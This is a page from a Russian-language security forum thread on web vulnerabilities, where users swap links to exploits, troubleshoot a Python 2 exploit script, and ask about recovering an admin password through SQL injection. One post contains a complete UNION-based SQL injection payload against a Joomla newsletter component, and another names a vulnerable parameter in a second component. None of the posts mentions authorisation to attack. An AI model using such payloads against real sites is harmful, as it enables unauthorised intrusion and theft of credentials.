HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #351  
Старый 03.04.2017, 13:32
Xeeper
Новичок
Регистрация: 06.03.2005
Сообщений: 19
Провел на форуме:
81759

Репутация: 5
По умолчанию

Парни, подскажите пожалуйста, пытаюсь протестировать сайт с помощью следующего эксплоита:

http://pastebin.com/raw/Xs8k2cHG

Видео его работы тут:

Стоит Python 3

при попытке запуска файла с эксплоитом в интерпретаторе вылазеет ошибка:

Код:
Code:
line 48
    print get_url(i, pl)
                ^
SyntaxError: invalid syntax
Подскажите что может быть не так?
 
Ответить с цитированием

  #352  
Старый 04.04.2017, 02:44
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от Xeeper  
Xeeper said:

Парни, подскажите пожалуйста, пытаюсь протестировать сайт с помощью следующего эксплоита:
http://pastebin.com/raw/Xs8k2cHG
Видео его работы тут:
Стоит Python 3
при попытке запуска файла с эксплоитом в интерпретаторе вылазеет ошибка:
Код:
Code:
line 48
    print get_url(i, pl)
                ^
SyntaxError: invalid syntax
Подскажите что может быть не так?
Оператор print был заменён функцией print(), с именованными аргументами для замены большей части синтаксиса старого оператора print

Используйте 2-ю версию python вместо 3 или перепишите код вручную под 3ю ветку
 
Ответить с цитированием

  #353  
Старый 26.04.2017, 00:21
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Парни, а если админ не заходит на сайт можно ли с помощью SQL inj попробовать востановить пароль админа?
 
Ответить с цитированием

  #354  
Старый 03.08.2017, 15:45
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

SQL-инъекция в компоненте ccNewsletter v2.1.9

option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d55647264 6b43704f44476e64694f6a6d6d6873795552656d5446767846 466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NUL L,NULL,NULL-- CCQB&tmpl=newsletter

Источник https://waf.pentestit.ru/vulns/844
 
Ответить с цитированием

  #355  
Старый 29.08.2017, 18:04
GreenGO
Guest
Сообщений: n/a
Провел на форуме:
137163

Репутация: 2
По умолчанию

Вроде не было нигде.

SQL-инъекция joomla 3.x

Компонент option=com_faqftw уязвимый параметр item
 
Ответить с цитированием

  #356  
Старый 27.11.2017, 12:06
serg1234
Guest
Сообщений: n/a
Провел на форуме:
2970

Репутация: 0
По умолчанию

Цитата:
я новичек - подскажите как это использовать? )
 
Ответить с цитированием

  #357  
Старый 27.11.2017, 21:21
pritomnik
Guest
Сообщений: n/a
Провел на форуме:
14993

Репутация: 0
По умолчанию

Цитата:
Сообщение от serg1234  
serg1234 said:

я новичек - подскажите как это использовать? )
В 99% случаях никак) Забудь!
 
Ответить с цитированием

  #358  
Старый 28.11.2017, 10:11
serg1234
Guest
Сообщений: n/a
Провел на форуме:
2970

Репутация: 0
По умолчанию

Цитата:
Сообщение от pritomnik  
pritomnik said:

В 99% случаях никак) Забудь!
ну 1% надежды - это уже немало! )

в принципе скрипт этот я нашел, но он не выполняет полный перебор - делает один цикл и завершает работу - не понятно пока отчего так
 
Ответить с цитированием

  #359  
Старый 10.10.2019, 20:00
nitupme
Guest
Сообщений: n/a
Провел на форуме:
5963

Репутация: 0
По умолчанию

https://www.exploit-db.com/exploits/47465 у кого нибудь сработало ?
 
Ответить с цитированием

  #360  
Старый 11.10.2019, 03:07
Pop-Xlop
Guest
Сообщений: n/a
Провел на форуме:
7175

Репутация: 8
По умолчанию

Цитата:
Сообщение от nitupme  
nitupme said:

https://www.exploit-db.com/exploits/47465
у кого нибудь сработало ?
Направление показано верное, а сплойт естественно работать не будет. Да и не актуально уже станет через пару дней.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ